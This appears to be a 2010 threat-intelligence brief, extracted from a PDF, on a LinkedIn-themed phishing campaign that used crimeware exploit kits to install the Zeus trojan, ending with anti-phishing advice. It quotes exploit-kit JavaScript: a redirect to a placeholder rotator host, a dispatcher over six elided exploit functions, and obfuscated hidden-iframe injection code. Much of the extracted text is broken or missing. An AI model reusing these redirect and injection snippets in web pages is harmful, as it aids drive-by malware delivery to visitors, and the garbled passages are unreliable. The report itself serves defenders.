daedalusfocus-linkedin-prf5 (1)

8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)

1/7ISSUE DATE: 22 OCTOBER 2010

LARGE-SCALE MALICIOUS

LINKEDIN PHISHING CAMPAIGN


2/7

Page 02

[email protected]

Copyright and DisclaimerThis report is Entity X, 2010. Where it has not been possible to locate the original copyright owner

of photographs and other non Entity X content we tender our apologies to any owner whose rights may

have been unwittingly infringed. The links to external websites included in this report are for ease of

reference only and Entity X takes no responsibility for the content presented.

THE DAEDALUS REPORT SERIESThe Entity X Daedalus series of reports informs clients of emerging trends and

developments in the areas of cyber threats, net-centric security and electronic

attack, authored by respected experts on the subject. The main monthly

Daedalus Report provides comprehensive analysis of notable emerging issues;

Daedalus Focus reports are issued as developments occur, providing technical

detail and code samples when appropriate; Daedalus Special reports are issued

to certain government clients only, highlighting sensitive matters relating to

exploitation opportunities. All Daedalus subscribers are invited to request

subjects to be covered in our Focus and Special reports, and provide feedbackon any of our products.

ContributorsRobi Sen, Analysis Director, Entity X

ABOUT ENTITY X

but now it affects every aspect of our lives, our work and our government.

and net-centric warfare. Were a team of highly experienced IT professionals

we seek to develop in our clients a greater and deeper understanding of the

range of disparate yet rapidly evolving threats that governments, businesses and

individuals face. Entity X Inc produces the Daedalus report series to inform and

brief our clients and we also provide consultancy and training in this specialized

LARGE-SCALE MALICIOUS

LINKEDIN PHISHING CAMPAIGN
http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://mail.google.com/support/bin/answer.py?hl=en&answer=180707


3/7

Page 3

LARGE-SCALE MALICIOUS LINKEDIN

PHISHING CAMPAIGN

Report OverviewA malicious phishing campaign themed on the LinkedIn networking website has been

underway since the last week of September and through early October. The campaignshows a higher than usual degree of sophistication on the part of the phishers and although

the phishing emails all use well-crafted LinkedIn-style templates intended to trick the user

into following a link to a website that will attempt to exploit their browser to install a Zeus

trojan, the actual exploits are being auto-generated by crimeware tools. Furthermore,

the phishers have changed the crimeware tools they use multiple times, perhaps in an

attempt to keep building momentum for their campaign. This could be a trend in phishing

and malware attacks where malicious hackers and criminal networks use crimeware to

accelerate and keep changing their campaigns in order to reduce the ability of email

providers, ISPs, and similar, to ameliorate their campaigns.

SUMMARY

Large-scale and changing LinkedIn themed phishing attack underway from late

September into October

Attack tactic involves changing the means used to exploit targets

Phishing campaign developers making large-scale use of various crimeware tools to

attempt to install Zeus trojans

Attack demonstrates more sophisticated, persistent, and adaptable phishing

campaign than usual perhaps because of use of crimeware tools that enable rapid

setup and development of malware attacks

LinkedIn-Themed Phishing EmailRecently a more sophisticated than usual phishing campaign has been targeting users

professional social networking site LinkedIn. Although the threat from the campaign is not

particularly high it shows an increasing sophistication in phishing tactics, an increase in the

use of crimeware1 tools, and an increase in the targeting of social networks. An example of

one of the phishing emails can be seen in Fig. 1 as it appeared in Googles Gmail. One of

people have been tricked into believing this is a genuine LinkedIn email.

1 By crimeware toolkits we mean software specially written for criminals that make the generation of viruses, trojans, malware-

infected websites, spam/phishing campaigns, and even command and control of botnets simple GUI-based operations.


4/7

Page 4

Fig. 1: A LinkedIn

phishing email as it

appeared Gmail

AnalysisClicking on the Visit your InBox now link redirects the user to a website (see Code

Listing 1 below) which initially redirects the user to a website that attempts to exploit their

machine via javascript created by the SEO Sploitkit.

if (navigator.javaEnabled())

{

var metka = 2;

}

location.href = (http://someaddress.info/asdfasgs/rotator.php?unique= + metka + );if (!frames.navigator[taintE + nabled]())

{

var metka = 1;

}

location.href = (http://someaddres.info/asdfasgs/rotator.php?unique= + metka + );

Code Listing 1: Simple JavaScript that redirects the user, depending on if it can perform

a data tainting attack

if none of them works the user is simply redirected to Google. The javascript is actually

Windows Help and Support, and Adobes Acrobat Reader via a PDF. For an example see

Code Listing 2 and Code Listing 3 below.
http://www.ipolicynetworks.com/technology/files/Seo_Analysis.htmlhttp://www.ipolicynetworks.com/technology/files/Seo_Analysis.html


5/7

Page 5

function PDF()

{ .. }

function arbt()

{ .. }

function JAVABOF()

{ .. }function MkM720Jny()

{ .. }

function JAVASGB()

{ .. }

function JAVASMB()

{ .. }

if (PDF() || arbt() || MkM720Jny() || JAVASMB() || JAVASGB() || JAVABOF() )

{

}

setTimeout(function ()

{

REDIRECT()

}

, 7000);

function redir()

{

window.location=http://google.com;

}

function REDIRECT()

{

setTimeout(redir();

, 1000);

}

Code Listing 2: SEO Sploit generated JavaScript that calls six different functions each of which

tries to install the Zeus trojan

Xbwd72ue1rb = 25-(12*2);

var Jztblyv7l = document.createElement(div);

Jztblyv7l.id = Gtjpqcdqt9jlbp;

document.body.appendChild(Jztblyv7l);

Yej6pkmusdgjp = Xbwd72ue1rb;

Qb0inb27krky = document.createElement(i)@f&!r())a !#&m)&e@)).replace(/$|#|&|\ |\

(|\)|@|\!/ig, ));

Qb0inb27krky.src = Rioso4oplcgzzhd8;

Qb0inb27krky.height = Xbwd72ue1rb;

Qb0inb27krky.width = Xbwd72ue1rb;

document.getElementById(Gtjpqcdqt9jlbp).appendChild(Qb0inb27krky);

return 0;

}

Code Listing 3:


6/7

Page 6

If any of these exploits work then the users computer will be infected with the Zeus trojan.

a period of a few days, appeared to change the crimeware kit they used two times. The

Phoenix toolkit. Then within

a number of days the perpetrator started another mass-emailing usingthe Crimepack

toolkit, each time using slightly different exploits but in general always to push trojans

that would turn an exploited users computer into a zombie for a botnet like Zeus. This isimportant in that it shows how crimeware allows even technically unsophisticated criminal

groups to rapidly change their attack campaigns.

Fortunately most of the major anti-virus and malware companies keep up with crimeware

However, many users do not keep their anti-virus programs up to date and are therefore

putting themselves at risk from such phishing attacks. Furthermore, it also seems that variants

of this same phishing campaign targeted Apple OSX users, infecting them with the Zeus

trojan. This is interesting in that while OSX has been attacked and has numerous viruses,

Apple operating systems have largely been ignored by phishing attacks using malware to infectuser systems, suggesting that malware campaigns will increasingly attack Apple products.

Avoiding Phishing Campaigns

1 Authenticate senders

2 Look for obvious signs of phishing

3 Do not click on links

4 Be careful when opening attachments, regardless of sender

applications up to date

Phishing attacks depend on the fact that most computer users practise poor internet

hygiene, are not aware of threats, and are too busy or distracted to pay attention to the

content of their emails. Almost all but the most sophisticated of phishing attacks can be

avoided by following some very simple steps:

1 Authenticating senders: Always turn on view email headers in your email program.

Gmail, offer an equivalent.2 Look for obvious signs of phishing: Look for bogus email addresses, link addresses

that do not match the sender, poorly spelled or grammatically incorrect content, or

simply out-of-context requests. For an example see Fig. 2.

3 Do not click on links: For example, in the case of this LinkedIn campaign instead of

clicking on the Visit your InBox now users would be protected by going directly to the

LinkedIn website and checking their messages from there.
http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29http://www.offensivecomputing.net/?q=node/1572http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://www.offensivecomputing.net/?q=node/1572http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29


7/7

Page 7

4 Be careful when opening attachments, regardless of sender: Unless you are

authenticity of their email.

up to date:

but most malware threats take advantage of security holes in browsers, applications,

users not keeping their systems up to date.

Fig. 2: LinkedIn

phishing email from 1

October 2010. When

viewed in Microsoft

Outlook with view

headers turned onthe email address

can be immediately

while mousing over a

link shows it pointing

to a suspect URL

Fake address

Phishing link

IMPLICATIONS

Security professionals: Spam and phishing will continue to be major issues,

with training users on how to protect themselves from this threat being the major

means to stop it.

Intelligence professionals: Intelligence professionals should note that it would

be a short step from theming LinkedIn phishing emails to actually setting up a

campaign that targets intelligence professionals who use LinkedIn themselves. There

is a surprisingly high number of law enforcement, defence, security, and intelligence

employees who use LinkedIn who could be susceptible to targeted phishing attacks.

daedalusfocus-linkedin-prf5 (1)

Documents